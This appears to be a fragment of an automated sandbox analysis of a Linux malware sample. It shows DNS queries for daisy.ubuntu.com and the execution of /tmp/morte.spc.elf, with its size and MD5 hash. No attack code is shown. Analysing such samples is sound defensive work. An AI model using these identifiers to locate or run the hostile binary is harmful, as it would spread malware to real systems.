                    Mar 26, 2025 03:56:49.260509014 CET192.168.2.131.1.1.10x22deStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                    Mar 26, 2025 03:56:49.260571957 CET192.168.2.131.1.1.10xa9beStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Mar 26, 2025 03:56:49.359936953 CET1.1.1.1192.168.2.130x22deNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                    Mar 26, 2025 03:56:49.359936953 CET1.1.1.1192.168.2.130x22deNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                    System Behavior

                    Start time (UTC):02:54:03
                    Start date (UTC):26/03/2025
                    Path:/tmp/morte.spc.elf
                    Arguments:/tmp/morte.spc.elf
                    File size:4379400 bytes
                    MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e